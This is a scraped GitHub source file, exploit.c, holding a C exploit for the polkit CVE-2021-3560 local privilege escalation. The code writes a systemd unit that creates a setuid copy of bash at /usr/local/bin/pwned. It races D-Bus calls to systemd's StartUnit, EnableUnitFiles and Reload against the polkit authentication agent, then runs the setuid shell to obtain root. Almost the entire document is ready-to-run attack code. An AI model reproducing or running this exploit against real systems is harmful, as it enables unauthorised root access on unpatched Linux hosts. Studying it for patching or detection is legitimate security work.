-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathexploit.c
139 lines (108 loc) · 4.09 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dbus/dbus.h>
#include <unistd.h>
#include <gio/gio.h>
#include <gio/gdbusconnection.h>
#include <dbus/dbus-glib-lowlevel.h>
#include "agent.h"
#define dprintf(format, ...) g_print("pid:%d - "format, getpid(), ##__VA_ARGS__)
#define dprintferr(format, ...) g_printerr("pid:%d - "format, getpid(), ##__VA_ARGS__)
struct arg_struct
{
char name[1024];
char path[1024];
} *arguments;
void *method_call_start_service(void *arguments)
{
struct arg_struct *args = arguments;
char *name = args->name;
dprintf("[*] trying to start systemd service '%s' ...\n", name);
GDBusConnection *connection = g_bus_get_sync (G_BUS_TYPE_SYSTEM, NULL, NULL);
g_dbus_connection_call_sync (connection, "org.freedesktop.systemd1" ,
"/org/freedesktop/systemd1",
"org.freedesktop.systemd1.Manager",
"StartUnit",
g_variant_new("(ss)", name, "replace"),
NULL, G_DBUS_CALL_FLAGS_ALLOW_INTERACTIVE_AUTHORIZATION, -1, NULL, NULL);
return 0;
}
void *method_call_reload_systemd()
{
dprintf("[*] trying to reload systemd daemon ...\n");
GDBusConnection *connection = g_bus_get_sync (G_BUS_TYPE_SYSTEM, NULL, NULL);
g_dbus_connection_call_sync(connection, "org.freedesktop.systemd1",
"/org/freedesktop/systemd1",
"org.freedesktop.systemd1.Manager",
"Reload",
NULL, /* no args */
NULL, G_DBUS_CALL_FLAGS_ALLOW_INTERACTIVE_AUTHORIZATION, -1, NULL, NULL);
return 0;
}
void *method_call_install_service(void *arguments){
struct arg_struct *args = arguments;
char *service_name[] = {args->path, NULL};
dprintf("[*] trying to enable system unit file \'%s\' ...\n", service_name[0]);
GDBusConnection *connection = g_bus_get_sync (G_BUS_TYPE_SYSTEM, NULL, NULL);
g_dbus_connection_call_sync(connection, "org.freedesktop.systemd1",
"/org/freedesktop/systemd1",
"org.freedesktop.systemd1.Manager",
"EnableUnitFiles",
g_variant_new ("(^asbb)", service_name, 1, 1),
NULL, G_DBUS_CALL_FLAGS_ALLOW_INTERACTIVE_AUTHORIZATION, -1, NULL, NULL);
return 0;
}
void write_unit_file(char *path) {
FILE *fp = fopen(path, "w");
if (fp){
fprintf(fp, "[Unit]\nAllowIsolate=no\n\n[Service]\n"
"ExecStart=/bin/bash -c 'cp /bin/bash /usr/local/bin/pwned; chmod +s /usr/local/bin/pwned'");
fclose(fp);
}
}
int main(int argc, char *argv[])
{
char *name;
pthread_t t1 , t2;
dprintf("[ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin\n");
if (argc == 1) {
name = "pwnkit.service";
} else {
name = argv[1];
}
arguments = malloc(sizeof(struct arg_struct) * 1);
memset(arguments, 0, sizeof(struct arg_struct));
memcpy(arguments->name, name, strlen(name));
sprintf(arguments->path, "/tmp/%s", arguments->name);
write_unit_file(arguments->path);
int pid_1 = fork();
int pid_2 = fork();
if (pid_1 == 0 && pid_2) {
pthread_create(&t1, NULL, &start_authentication_agent, NULL);
sleep(1);
pthread_create(&t2, NULL, &method_call_start_service, (void *)arguments);
} else if (pid_2 == 0 && pid_1) {
pthread_create(&t1, NULL, &start_authentication_agent, NULL);
sleep(1);
pthread_create(&t2, NULL, &method_call_install_service, (void *)arguments);
} else if (pid_1 == 0 && pid_2 == 0) {
pthread_create(&t1, NULL, &start_authentication_agent, NULL);
sleep(1);
pthread_create(&t2, NULL, &method_call_reload_systemd, NULL);
} else {
dprintf("[*] main process running ...\n");
for (int i=0; i<5; i++) {
sleep(1);
if( access("/usr/local/bin/pwned", F_OK) == 0 ) {
dprintf("[+] file exists, popping root shell ...\n");
system("/usr/local/bin/pwned -p");
return 0;
}
}
dprintf("[-] exploit failed, please try again");
return 1;
}
sleep(3);
return 0;
}